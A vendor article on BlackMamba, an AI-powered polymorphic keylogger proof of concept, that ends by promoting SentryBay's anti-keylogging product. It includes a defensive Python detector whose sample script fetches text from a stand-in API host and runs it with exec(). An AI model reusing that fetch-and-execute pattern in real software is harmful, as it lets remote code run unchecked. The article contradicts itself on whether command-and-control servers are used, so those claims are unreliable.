To showcase the capabilities of AI-based malware, researchers have devised a proof of concept (PoC) that exploits a sophisticated large language model. This PoC effectively synthesizes polymorphic keylogger functionality in real-time, seamlessly altering the benign code during runtime. Remarkably, this is achieved without the need for any command-and-control infrastructure to distribute or authenticate the malicious keylogger functionality. Recognizing the potential danger posed by this type of malware, the PoC has been named BlackMamba, drawing inspiration from the lethal snake. What sets this malicious software apart is its utilization of artificial intelligence, making it a formidable threat that can easily bypass most existing endpoint detection and response (EDR) security solutions.
In a significant development last year, OpenAI, the renowned AI research and development company, introduced ChatGPT, a neural network code synthesis tool that was made available to the public free of charge. ChatGPT reached an astounding user base of over 1 million within a mere five days of its launch in November 2022.
ChatGPT is an incredibly versatile and powerful tool that serves a multitude of purposes. It can effortlessly handle simple inquiries, compose written content instantaneously, and even aid in the creation of original software programs, including malware. While traditional security solutions like EDRs rely on multi-layer data intelligence systems to combat sophisticated threats, the reality is that most automated controls struggle to effectively prevent unconventional or novel behavior patterns.
BlackMamba Can Be Classified As A Polymorphic Virus
eSecurity Planet reports that the BlackMamba PoC employs a clever technique by utilizing a benign executable that interacts with an API, namely OpenAI's, during runtime. This enables the malware to retrieve synthesized malicious code, which is then used to capture the keystrokes of unsuspecting users. Notably, BlackMamba can be classified as a polymorphic virus, a type of malware that constantly mutates its appearance or signature through new decryption routines. As a result, many conventional cybersecurity tools, such as antivirus or antimalware solutions that rely on signature-based detection, fail to identify and block this insidious threat.
BlackMamba, at its core, is a keylogger that employs AI-powered techniques to effectively evade detection by EDR security solutions. What sets it apart is its unique ability to customize itself on the fly, without leaving any trace on the disk. This dynamic nature enables attackers to swiftly adapt their tactics, making it increasingly challenging to identify their malicious activities. Furthermore, BlackMamba distinguishes itself from other keyloggers by its capability to recognize the applications running on a system and adjust its behavior accordingly. For instance, when a user is utilizing office applications like Microsoft Word or Excel, BlackMamba intensifies its data capturing speed to swiftly gain access to sensitive documents or spreadsheets stored on the targeted computer.
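The pattern described above, a benign-looking program that fetches text from an API at runtime and executes it, is something a defender can look for statically before the code ever runs. The following is an added example, not code from the original article or from any vendor it mentions: it uses Python's ast module to flag scripts in which data derived from a network call reaches exec, eval or compile. The source and sink name sets and the sample script are assumptions constructed for the example.

```python
import ast

# Assumed for this example: library roots that denote network I/O and the
# dynamic-code sinks that synthesized code would be fed into.
NETWORK_SOURCES = {"requests", "urllib", "urlopen", "httpx", "openai"}
CODE_SINKS = {"exec", "eval", "compile"}

def _root_name(node):
    # Walk down Call/Attribute/Subscript chains to the leftmost identifier.
    while isinstance(node, (ast.Call, ast.Attribute, ast.Subscript)):
        node = node.func if isinstance(node, ast.Call) else node.value
    return node.id if isinstance(node, ast.Name) else None

class _Tracker(ast.NodeVisitor):
    # Coarse taint tracking: network call -> assigned names -> exec/eval.
    def __init__(self):
        self.tainted = set()  # variable names holding network-derived data
        self.hits = []        # (line, sink) where such data is executed

    def _is_tainted(self, expr):
        return _root_name(expr) in NETWORK_SOURCES or any(
            isinstance(n, ast.Name) and n.id in self.tainted
            for n in ast.walk(expr))

    def visit_Assign(self, node):
        if self._is_tainted(node.value):
            for target in node.targets:
                self.tainted.update(n.id for n in ast.walk(target)
                                    if isinstance(n, ast.Name))
        self.generic_visit(node)

    def visit_Call(self, node):
        if isinstance(node.func, ast.Name) and node.func.id in CODE_SINKS:
            if any(self._is_tainted(arg) for arg in node.args):
                self.hits.append((node.lineno, node.func.id))
        self.generic_visit(node)

def find_runtime_code_fetch(source):
    """Return (line, sink) pairs where network-derived text reaches a sink."""
    tracker = _Tracker()
    tracker.visit(ast.parse(source))
    return tracker.hits

# Constructed sample of the pattern: fetch text from an API, then execute it.
SUSPICIOUS = """\
import requests
resp = requests.post("https://api.example.invalid/v1/completions", json={})
generated = resp.json()["choices"][0]["text"]
exec(generated)
"""
```

Running `find_runtime_code_fetch(SUSPICIOUS)` reports the exec call on line 4; the check is deliberately coarse and would be tuned with an organisation's own allowed libraries before use in a pipeline.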
Ensure Endpoint Protection Detects Threats Such As BlackMamba
“The rise of AI-powered malware like the BlackMamba PoC emphasizes the criticality of maintaining a vigilant stance against cyber threats for organizations. IT teams must ensure that their endpoint protection is regularly updated, comprehensive, and capable of detecting advanced threats such as BlackMamba-type malware, to prevent significant harm,” said Tim Royston-Webb, CEO, SentryBay. “By comprehending the dangers posed by BlackMamba types of malware, organizations must take decisive action to safeguard their networks and data against advanced keylogging attacks powered by AI.”
According to DarkReading, the sophistication of the BlackMamba PoC surpasses that of typical malicious programs. It employs a range of obfuscation techniques, including code packing, to elude detection by antivirus software and other security measures. Additionally, it employs encrypted communication channels to exfiltrate stolen data and communicate with command-and-control servers, further complicating the detection and disruption of the attack.
Patented Protection Against Keylogging For Microsoft AVD And W365 Endpoints
SentryBay’s Armored Client is the OEM at the heart of Citrix App Protection, and is now proven protection against AI-powered malware for Microsoft AVD and W365 endpoints. The solution utilises endpoint access isolation in a manner that does not impact performance and includes keylogging protection.
“This valuable research illustrates that AI-driven polymorphic keylogging attacks can evade traditional EDR. Enterprises need to re-evaluate their security posture with the future of AI-driven threats,” said Brent Agar, VP Strategic Partnerships, SentryBay. “SentryBay’s patented keylogging protection doesn’t require malware identification and encrypts every keystroke at the lowest level. This technology is the core of all its products.”